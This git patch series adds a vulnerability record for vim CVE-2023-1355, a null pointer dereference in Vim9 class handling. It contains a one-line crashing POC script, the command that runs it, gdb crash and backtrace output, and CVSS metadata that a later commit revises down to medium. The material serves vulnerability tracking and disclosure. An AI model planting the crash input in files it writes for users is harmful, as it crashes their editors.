From ff0e2e103154d81c199bf68023d15111a84fd2d9 Mon Sep 17 00:00:00 2001 From: bigdatahcchen Date: Wed, 15 Mar 2023 16:51:49 +0800 Subject: [PATCH 1/2] =?UTF-8?q?=E9=99=88=E6=99=A8-=E6=B7=BB=E5=8A=A0?= =?UTF-8?q?=E4=BA=86vim=20CVE-2023-1355=20=E6=BC=8F=E6=B4=9E=E7=9A=84?= =?UTF-8?q?=E6=8F=8F=E8=BF=B0=E5=92=8CPOC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/vim/2023/CVE-2023-1355/POC | 1 + cve/vim/2023/CVE-2023-1355/README.md | 146 +++++++++++++++++++++++++++ cve/vim/2023/yaml/CVE-2023-1355.yaml | 21 ++++ openkylin_list.yaml | 3 +- 4 files changed, 170 insertions(+), 1 deletion(-) create mode 100644 cve/vim/2023/CVE-2023-1355/POC create mode 100644 cve/vim/2023/CVE-2023-1355/README.md create mode 100644 cve/vim/2023/yaml/CVE-2023-1355.yaml diff --git a/cve/vim/2023/CVE-2023-1355/POC b/cve/vim/2023/CVE-2023-1355/POC new file mode 100644 index 00000000..dc324c15 --- /dev/null +++ b/cve/vim/2023/CVE-2023-1355/POC @@ -0,0 +1 @@ +vim9@_ =null_class.a \ No newline at end of file diff --git a/cve/vim/2023/CVE-2023-1355/README.md b/cve/vim/2023/CVE-2023-1355/README.md new file mode 100644 index 00000000..979aecc9 --- /dev/null +++ b/cve/vim/2023/CVE-2023-1355/README.md @@ -0,0 +1,146 @@ +# 描述 +问题:vim/vim 中 vim9class.c:1356 处的 class_object_index 存在空指针引用错误 +描述:在“vim9class.c:1356”中的class_object_index发生了空指针解引用,变量cl在“vim9class.c:1254”的class_object_index中为NULL,最后参考cl时也是NULL。 +漏洞类型:空指针解引用 +# 版本 +v9.0.1374版本 +```shell +$ git log +commit c727b19e9f1df36e44321d933334c7b4961daa54 (HEAD -> master, tag: v9.0.1374, origin/master, origin/HEAD) +Author: Yegappan Lakshmanan +Date: Fri Mar 3 12:26:15 2023 +0000 + + patch 9.0.1374: function for setting options not used consistently + + Problem: Function for setting options not used consistently. + Solution: Use a function for 'encoding' and terminal options. (Yegappan + Lakshmanan, closes #12099) +``` + +# Proof of Concept + +```shell +$ ./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc -c :qa! +Segmentation fault (core dumped) +``` + +# Debug +```shell +gdb-peda$ r -u NONE -i NONE -n -m -X -Z -e -s -S poc -c :qa! +Starting program: /home/user/recentvim/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S poc -c :qa! +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Program received signal SIGSEGV, Segmentation fault. +Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated. +Use 'set logging enabled off'. + +Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated. +Use 'set logging enabled on'. + + +[----------------------------------registers-----------------------------------] +RAX: 0x0 +RBX: 0x0 +RCX: 0x2 +RDX: 0x55555569ba29 (: endbr64) +RSI: 0x0 +RDI: 0x555555969673 --> 0x210000000061 ('a') +RBP: 0x7fffffffbc80 --> 0x7fffffffbd20 --> 0x7fffffffbda0 --> 0x7fffffffbe20 --> 0x7fffffffbeb0 --> 0x7fffffffbff0 (--> ...) +RSP: 0x7fffffffb9f0 --> 0x100000000 +RIP: 0x5555558074d1 (: mov eax,DWORD PTR [rax+0x40]) +R8 : 0x1 +R9 : 0x55555596c710 ("E1004: White space required before and after '=' at \"\t=null_class.a\"") +R10: 0x55555596ccc0 --> 0x570 +R11: 0xa ('\n') +R12: 0x7fffffffddf8 --> 0x7fffffffe1fe ("/home/user/recentvim/vim/src/vim") +R13: 0x55555588a9b7 (
: endbr64) +R14: 0x555555906038 --> 0x55555558cac0 (<__do_global_dtors_aux>: endbr64) +R15: 0x7ffff7ffd040 --> 0x7ffff7ffe2e0 --> 0x555555554000 --> 0x10102464c457f +EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) +[-------------------------------------code-------------------------------------] + 0x5555558074c1 : jmp 0x55555580750d + 0x5555558074c3 : add DWORD PTR [rbp-0x254],0x1 + 0x5555558074ca : mov rax,QWORD PTR [rbp-0x238] +=> 0x5555558074d1 : mov eax,DWORD PTR [rax+0x40] + 0x5555558074d4 : cmp DWORD PTR [rbp-0x254],eax + 0x5555558074da : jl 0x5555558073be + 0x5555558074e0 : mov rax,QWORD PTR [rbp-0x238] + 0x5555558074e7 : mov rax,QWORD PTR [rax] +[------------------------------------stack-------------------------------------] +0000| 0x7fffffffb9f0 --> 0x100000000 +0008| 0x7fffffffb9f8 --> 0x7fffffffc510 --> 0x1 +0016| 0x7fffffffba00 --> 0x7fffffffc500 --> 0x10 +0024| 0x7fffffffba08 --> 0x7fffffffc440 --> 0x555555969673 --> 0x210000000061 ('a') +0032| 0x7fffffffba10 --> 0x0 +0040| 0x7fffffffba18 --> 0x0 +0048| 0x7fffffffba20 --> 0x0 +0056| 0x7fffffffba28 --> 0x0 +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value +Stopped reason: SIGSEGV +0x00005555558074d1 in class_object_index (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, verbose=0x1) at vim9class.c:1356 +1356 for (int i = 0; i < cl->class_class_member_count; ++i) +gdb-peda$ bt +#0 0x00005555558074d1 in class_object_index (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, verbose=0x1) at vim9class.c:1356 +#1 0x00005555555f3045 in handle_subscript (arg=0x7fffffffc440, name_start=0x0, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, verbose=0x1) at eval.c:6934 +#2 0x00005555555ee0f3 in eval9 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, want_string=0x0) at eval.c:4310 +#3 0x00005555555ed2bb in eval8 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, want_string=0x0) at eval.c:3840 +#4 0x00005555555ecd0b in eval7 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510, want_string=0x0) at eval.c:3644 +#5 0x00005555555ec452 in eval6 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3423 +#6 0x00005555555ec114 in eval5 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3312 +#7 0x00005555555ebbe8 in eval4 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3163 +#8 0x00005555555eb6f7 in eval3 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:3024 +#9 0x00005555555eb21f in eval2 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:2898 +#10 0x00005555555eaad2 in eval1 (arg=0x7fffffffc440, rettv=0x7fffffffc500, evalarg=0x7fffffffc510) at eval.c:2744 +#11 0x00005555555ea85a in eval0_retarg (arg=0x555555969668 "null_class.a", rettv=0x7fffffffc500, eap=0x7fffffffc6a0, evalarg=0x7fffffffc510, retarg=0x0) at eval.c:2655 +#12 0x00005555555ea69b in eval0 (arg=0x555555969668 "null_class.a", rettv=0x7fffffffc500, eap=0x7fffffffc6a0, evalarg=0x7fffffffc510) at eval.c:2589 +#13 0x0000555555608779 in ex_let (eap=0x7fffffffc6a0) at evalvars.c:1149 +#14 0x0000555555607eb8 in ex_var (eap=0x7fffffffc6a0) at evalvars.c:960 +#15 0x000055555562314c in do_one_cmd (cmdlinep=0x7fffffffc8d0, flags=0x7, cstack=0x7fffffffc9b0, fgetline=0x55555575fe37 , cookie=0x7fffffffd120) at ex_docmd.c:2580 +#16 0x000055555562009e in do_cmdline (cmdline=0x55555596c350 "vim9@_\t=null_class.a", fgetline=0x55555575fe37 , cookie=0x7fffffffd120, flags=0x7) at ex_docmd.c:993 +#17 0x000055555575eca8 in do_source_ext (fname=0x555555968893 "poc", check_other=0x0, is_vimrc=0x0, ret_sid=0x0, eap=0x0, clearvars=0x0) at scriptfile.c:1759 +#18 0x000055555575f3a3 in do_source (fname=0x555555968893 "poc", check_other=0x0, is_vimrc=0x0, ret_sid=0x0) at scriptfile.c:1905 +#19 0x000055555575de5f in cmd_source (fname=0x555555968893 "poc", eap=0x7fffffffd2d0) at scriptfile.c:1250 +#20 0x000055555575dea6 in ex_source (eap=0x7fffffffd2d0) at scriptfile.c:1276 +#21 0x000055555562314c in do_one_cmd (cmdlinep=0x7fffffffd500, flags=0xb, cstack=0x7fffffffd5e0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 +#22 0x000055555562009e in do_cmdline (cmdline=0x555555968850 "so poc", fgetline=0x0, cookie=0x0, flags=0xb) at ex_docmd.c:993 +#23 0x000055555561f535 in do_cmdline_cmd (cmd=0x555555968850 "so poc") at ex_docmd.c:587 +#24 0x000055555588e6da in exe_commands (parmp=0x555555953800 ) at main.c:3146 +#25 0x000055555588b50f in vim_main2 () at main.c:782 +#26 0x000055555588ae7c in main (argc=0xf, argv=0x7fffffffddf8) at main.c:433 +#27 0x00007ffff7c29d90 in __libc_start_call_main (main=main@entry=0x55555588a9b7
, argc=argc@entry=0xf, argv=argv@entry=0x7fffffffddf8) at ../sysdeps/nptl/libc_start_call_main.h:58 +#28 0x00007ffff7c29e40 in __libc_start_main_impl (main=0x55555588a9b7
, argc=0xf, argv=0x7fffffffddf8, init=, fini=, rtld_fini=, + stack_end=0x7fffffffdde8) at ../csu/libc-start.c:392 +#29 0x000055555558ca45 in _start () +gdb-peda$ p cl +$1 = (class_T *) 0x0 +gdb-peda$ p *(typval_T *) rettv +$2 = { + v_type = VAR_CLASS, + v_lock = 0x0, + vval = { + v_number = 0x0, + v_float = 0, + v_string = 0x0, + v_list = 0x0, + v_dict = 0x0, + v_partial = 0x0, + v_job = 0x0, + v_channel = 0x0, + v_blob = 0x0, + v_instr = 0x0, + v_class = 0x0, + v_object = 0x0 + } +} + +``` + +# POC + +[POC](https://drive.google.com/file/d/1E4Pq8-iuhQ9aY_i0d-ibamYHvR5XmIsr/view?usp=share_link) + +# 影响 + +导致代码执行使得程序异常终止或崩溃 \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-1355.yaml b/cve/vim/2023/yaml/CVE-2023-1355.yaml new file mode 100644 index 00000000..99af252e --- /dev/null +++ b/cve/vim/2023/yaml/CVE-2023-1355.yaml @@ -0,0 +1,21 @@ +id: CVE-2023-1355 +source: https://huntr.dev/bounties/4d0a9615-d438-4f5c-8dd6-aa22f4b716d9/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + vim/vim 中 vim9class.c:1356 处的 class_object_index 存在空指针引用错误 + scope-of-influence: + vim v9.0.1374 + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1355 + - https://ubuntu.com/security/CVE-2023-1355 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-1355 + cwe-id: CWE-476 + cnvd-id: None + kve-id: None + tags: cve2023, 空指针解引用 + \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 5a8b7367..c5e652f6 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -76,6 +76,7 @@ cve: - CVE-2022-2264 - CVE-2022-2598 - CVE-2023-0433 + - CVE-2023-1355 openssl: - CVE-2022-1292 - CVE-2022-2274 @@ -105,4 +106,4 @@ kve: kylin-display-switch: - KVE-2022-0206 kylin-activation: - - KVE-2022-0231 \ No newline at end of file + - KVE-2022-0231 -- Gitee From 92f340ba14238d644537fc7105a97f6aebb4b698 Mon Sep 17 00:00:00 2001 From: chenchen Date: Sun, 26 Mar 2023 09:05:59 +0000 Subject: [PATCH 2/2] update cve/vim/2023/yaml/CVE-2023-1355.yaml. Signed-off-by: chenchen --- cve/vim/2023/yaml/CVE-2023-1355.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cve/vim/2023/yaml/CVE-2023-1355.yaml b/cve/vim/2023/yaml/CVE-2023-1355.yaml index 99af252e..5b1b5284 100644 --- a/cve/vim/2023/yaml/CVE-2023-1355.yaml +++ b/cve/vim/2023/yaml/CVE-2023-1355.yaml @@ -2,17 +2,17 @@ id: CVE-2023-1355 source: https://huntr.dev/bounties/4d0a9615-d438-4f5c-8dd6-aa22f4b716d9/ info: name: Vim是一款基于UNIX平台的编辑器。 - severity: high + severity: medium description: | vim/vim 中 vim9class.c:1356 处的 class_object_index 存在空指针引用错误 scope-of-influence: vim v9.0.1374 reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1355 + - https://nvd.nist.gov/vuln/detail/CVE-2023-1355 - https://ubuntu.com/security/CVE-2023-1355 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 7.8 + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H + cvss-score: 5.5 cve-id: CVE-2023-1355 cwe-id: CWE-476 cnvd-id: None -- Gitee